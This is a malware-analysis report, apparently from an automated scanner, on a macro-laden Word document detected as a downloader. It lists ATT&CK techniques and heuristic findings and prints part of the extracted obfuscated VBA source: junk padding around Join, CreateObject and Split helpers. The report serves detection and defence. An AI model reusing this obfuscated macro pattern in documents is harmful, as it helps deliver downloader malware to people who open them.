MALICIOUS
Risk Score: 202
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The sample contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for initial execution. The critical ClamAV detection identifies it as 'Doc.Downloader.Logan-9781905-0', strongly suggesting its purpose is to download and execute a secondary payload. The obfuscated VBA code further supports this, as it likely contains logic to fetch and run additional malicious content.
Heuristics (6)

| Finding | Severity | ID | Description |
|---|---|---|---|
| ClamAV: Doc.Downloader.Logan-9781905-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Downloader.Logan-9781905-0 |
| VBA macros detected (3 related findings) | medium | OLE_VBA_MACROS | Document contains VBA macro code |
| Document_Open macro | high | OLE_VBA_DOCOPEN | Document_Open auto-execution macro |
| CreateObject call | high | OLE_VBA_CREATEOBJ | CreateObject call |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body) |
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (hash f977b274eae3d98ca756a10910ec7f42c1a29b087c225685f92a2f289133a3d9) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 18827 bytes |

Preview script: first 1,000 lines of the extracted script (the listing is truncated below). Most of the body is padding, arithmetic on and assignments between undeclared names that never influence a result; the functional statements are the Join call in He19a_qqct6, the CreateObject call in W0zcn1_o6t5 and the Split on the delimiter "=PO32" in H461iq02y3s4mp.
Attribute VB_Name = "J9bhulsu4okpn"
Function He19a_qqct6(Zu8viad2fi7d)
On Error Resume Next
Set BHbBAu = hnWmAK
Dim XxbZEiVJ(6 + 5 + 1 + 7) As String
XxbZEiVJ(VlYzI) = (1337 + 7)
szVeJiSD = RdneGqW
XxbZEiVJ(VlYzI) = (VKKzFYaTF + 4544)
XxbZEiVJ(VlYzI) = (6 + 57 + oDLACGDF)
Set HShVpITD = YNQxB
Dim FLTtEFD(5 + 6 + 1 + 7) As String
FLTtEFD(afngEI) = (7 + 6)
RikxMD = zgbCLBHZP
FLTtEFD(afngEI) = (VYFdGHCAA + 719)
FLTtEFD(afngEI) = (948 + 3 + tAfsFDy)
Set oniHDmKDE = QNGUG
Dim zerUJ(8 + 8 + 1 + 7) As String
zerUJ(ApQttEo) = (30 + 3)
TKKJIE = iFASF
zerUJ(ApQttEo) = (JpLYJF + 40)
zerUJ(ApQttEo) = (64 + 52 + NiojJIHG)
He19a_qqct6 = Join(Zu8viad2fi7d, Mx3i71r_7y98f)
Set SeHjFI = BYLkB
Dim GtmhF(5 + 6 + 1 + 4) As String
GtmhF(cJimvD) = (3593 + 30)
duADCcVyV = OVfDCbRD
GtmhF(cJimvD) = (aYaoHI + 22)
GtmhF(cJimvD) = (4266 + 598 + UZAxBJADB)
Set wzAqQAiN = bnJNCIA
Dim okpXBI(5 + 8 + 1 + 8) As String
okpXBI(aPxbxEbCB) = (882 + 8)
zYErs = pMnKJg
okpXBI(aPxbxEbCB) = (QEsGYYF + 3)
okpXBI(aPxbxEbCB) = (376 + 32 + JjpqHA)
Set JVORBID = WrqnC
Dim IyqOJClFA(8 + 6 + 1 + 6) As String
IyqOJClFA(uGTcIsCi) = (7 + 34)
eLGLZcK = tUwFZvHt
IyqOJClFA(uGTcIsCi) = (xFMfC + 9)
IyqOJClFA(uGTcIsCi) = (1280 + 6781 + ETmiaIH)
End Function
Function W0zcn1_o6t5(Mdk1zyotaw1kvda)
On Error Resume Next
Set JQTRDDB = oVLUB
Dim rBSfF(6 + 8 + 1 + 4) As String
rBSfF(KjWPxFP) = (176 + 2)
tEDyH = NttaIIF
rBSfF(KjWPxFP) = (RkZQZJ + 7)
rBSfF(KjWPxFP) = (4 + 8 + HYlRCYA)
Set SNaDDsHA = dDDAwGZ
Dim GVbLJ(5 + 8 + 1 + 7) As String
GVbLJ(jneBBDCd) = (17 + 14)
DOKGFAX = DahjM
GVbLJ(jneBBDCd) = (rCbuRAI + 950)
GVbLJ(jneBBDCd) = (3747 + 3 + vcyzH)
Set LKnuGA = NrIVoIvE
Dim CsGZxExGC(7 + 7 + 1 + 8) As String
CsGZxExGC(EPrbXeF) = (7481 + 1)
DQLZHBP = FzdEBUPDN
CsGZxExGC(EPrbXeF) = (hMoLkx + 1951)
CsGZxExGC(EPrbXeF) = (3286 + 8 + SxFdG)
Set W0zcn1_o6t5 = CreateObject(Mdk1zyotaw1kvda)
Set EKKaEIN = SqdRMHEE
Dim qCxeG(5 + 8 + 1 + 5) As String
qCxeG(tuLrLHbIp) = (43 + 27)
dJJSDjJR = GQCTAUE
qCxeG(tuLrLHbIp) = (XbyGL + 4655)
qCxeG(tuLrLHbIp) = (230 + 99 + ZFlxIK)
Set DLZRpFEg = HtMqsDIEZ
Dim qLqlHv(6 + 8 + 1 + 7) As String
qLqlHv(ovOlrS) = (252 + 24)
DOHDBI = BhfttFtzF
qLqlHv(ovOlrS) = (XWHmAGB + 3917)
qLqlHv(ovOlrS) = (812 + 39 + pYAjC)
Set ilJFJGm = pTYuAYP
Dim xGOWaC(7 + 8 + 1 + 6) As String
xGOWaC(HvtIFEzC) = (304 + 9349)
PqRlnHZkE = gDtBr
xGOWaC(HvtIFEzC) = (swbMKJDF + 12)
xGOWaC(HvtIFEzC) = (9 + 6522 + mhUIGbZu)
End Function
Function H461iq02y3s4mp(Wylmux_slnl9_undc6)
On Error Resume Next
Set XAcsKq = jzchHFioF
Dim QYHKXF(8 + 5 + 1 + 4) As String
QYHKXF(RWMDgEGJH) = (1 + 4)
lYPUg = CoPmBEFJD
QYHKXF(RWMDgEGJH) = (CgdrpDmWH + 9522)
QYHKXF(RWMDgEGJH) = (6 + 8775 + AdrMFE)
Set WKclB = mFshEGmDC
Dim XjKbIBb(8 + 5 + 1 + 6) As String
XjKbIBb(spEDDF) = (6 + 566)
NGwMcJAF = ewmpCFAlR
XjKbIBb(spEDDF) = (PkcFHEo + 2)
XjKbIBb(spEDDF) = (148 + 5 + LtUhC)
Set dQKRwQ = RUjducVk
Dim xdhLu(5 + 6 + 1 + 8) As String
xdhLu(fNtbIeJC) = (4 + 7575)
sWLiJmbI = VLjHH
xdhLu(fNtbIeJC) = (nSCnpS + 3)
xdhLu(fNtbIeJC) = (1 + 8 + vGUtC)
H461iq02y3s4mp = Split(Wylmux_slnl9_undc6, "=PO32")
Set bgqLgPHHZ = hGdysR
Dim CSPxCHFC(6 + 5 + 1 + 7) As String
CSPxCHFC(FcIQBJPDY) = (3 + 4)
FAHpSAJT = bcAPX
CSPxCHFC(FcIQBJPDY) = (qbGwALEF + 3993)
CSPxCHFC(FcIQBJPDY) = (4 + 905 + vnrQj)
Set xDPGFggiB = TgihrGA
Dim wuIyZBCqI(5 + 5 + 1 + 6) As String
wuIyZBCqI(naQvpYHf) = (43 + 40)
qXqtJIEEJ = GPYUJkb
wuIyZBCqI(naQvpYHf) = (dzMDE + 1)
wuIyZBCqI(naQvpYHf) = (9 + 63 + dodPmJ)
Set geWyCk = hYxhC
Dim ewNiEaF(7 + 6 + 1 + 7) As String
ewNiEaF(ZthUEv) = (74 + 4399)
XPuvgFxHJ = tsBXzBcI
ewNiEaF(ZthUEv) = (FRMpILEH + 3)
ewNiEaF(ZthUEv) = (8 + 858 + tCDXkJ)
End Function
Attribute VB_Name = "Rzbxee27ii3py1"
Attribute VB_Base = "0{29B1D78E-08FB-4EA1-AD90-C11E867946C1}{64FD6A9E-CB89-4642-920F-14B89AE18AF5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizabl
... (truncated)